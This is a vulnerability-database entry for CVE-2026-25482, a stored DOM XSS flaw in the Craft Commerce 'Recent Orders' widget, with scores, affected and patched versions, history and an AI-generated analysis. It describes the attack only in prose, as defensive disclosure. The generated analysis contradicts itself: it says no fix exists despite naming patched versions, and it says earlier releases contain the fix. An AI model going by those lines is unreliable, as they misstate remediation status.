Description
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored DOM XSS vulnerability exists in the "Recent Orders" dashboard widget. The Order Status Name is rendered via JavaScript string concatenation without proper escaping, allowing script execution when any admin visits the dashboard. This issue has been patched in versions 4.10.1 and 5.5.2.
Published: 2026-02-03
Score: 6.2 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored DOM XSS
Action: Patch Now
AI Analysis

Impact

Craft Commerce versions 4.0.0‑RC1 to 4.10.0 and 5.0.0 to 5.5.1 expose a stored DOM-based cross‑site scripting flaw in the Recent Orders dashboard widget. The Order Status Name is concatenated directly into JavaScript without escaping, enabling an attacker to inject arbitrary scripts that run whenever an administrator views the dashboard. This code executes with the privileges of the logged‑in admin, enabling actions such as session hijacking, credential theft, or lateral movement within the site.

Affected Systems

Affected products are Craft CMS Commerce for the Craft CMS platform. The vulnerability applies to all releases from version 4.0.0‑RC1 up to and including 4.10.0, and from version 5.0.0 through 5.5.1. Earlier or later releases, including 4.10.1 and 5.5.2, contain the fix.

Risk and Exploitability

The CVSS score of 6.2 reflects moderate severity, and the EPSS indicates a less than 1% probability that exploitation is observed in the wild, meaning it is unlikely to be the target of current attacks. The flaw is not listed in the CISA KEV catalog, further suggesting limited exploitation. An attacker must first authenticate with administrator credentials to load the vulnerable page; once authenticated, any payload placed into an Order Status Name will execute immediately, granting the attacker the same in‑browser privileges as the admin. Thus, the risk is contingent on privileged access and the ability to modify order status names.

Generated by OpenCVE AI on April 18, 2026 at 00:14 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Craft Commerce to at least version 4.10.1 or 5.5.2, which contain the patch for this DOM XSS flaw.
  • Restrict editing of Order Status Names to administrators only, preventing unauthenticated or lower‑privilege users from introducing malicious content.
  • If an update cannot be performed immediately, apply a strong content‑security‑policy that blocks inline JavaScript execution on the admin dashboard to reduce the impact of any injected payloads.

Generated by OpenCVE AI on April 18, 2026 at 00:14 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-frj9-9rwc-pw9j Craft Commerce has Stored DOM XSS in Order Status Name (Reflects in "Recent Orders" Dashboard Widget)
History

Tue, 10 Feb 2026 18:15:00 +0000

Type Values Removed Values Added
First Time appeared Craftcms craft Commerce
CPEs cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*
cpe:2.3:a:craftcms:craft_commerce:4.0.0:-:*:*:*:craft_cms:*:*
cpe:2.3:a:craftcms:craft_commerce:4.0.0:rc1:*:*:*:craft_cms:*:*
Vendors & Products Craftcms craft Commerce
Metrics cvssV3_1

{'score': 4.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}

Wed, 04 Feb 2026 17:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 04 Feb 2026 12:15:00 +0000

Type Values Removed Values Added
First Time appeared Craftcms
Craftcms commerce
Vendors & Products Craftcms
Craftcms commerce

Tue, 03 Feb 2026 18:30:00 +0000

Type Values Removed Values Added
Description Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored DOM XSS vulnerability exists in the "Recent Orders" dashboard widget. The Order Status Name is rendered via JavaScript string concatenation without proper escaping, allowing script execution when any admin visits the dashboard. This issue has been patched in versions 4.10.1 and 5.5.2.
Title Craft Commerce has Stored DOM XSS in Order Status Name (Reflects in "Recent Orders" Dashboard Widget)
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 6.2, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N'}

Subscriptions

Craftcms Commerce Craft Commerce
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-04T16:51:24.031Z

Reserved: 2026-02-02T16:31:35.821Z

Link: CVE-2026-25482

cve-icon Vulnrichment

Updated: 2026-02-04T15:46:24.947Z

cve-icon NVD

Status : Analyzed

Published: 2026-02-03T19:16:25.563

Modified: 2026-02-10T18:13:27.020

Link: CVE-2026-25482

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T00:15:31Z

Weaknesses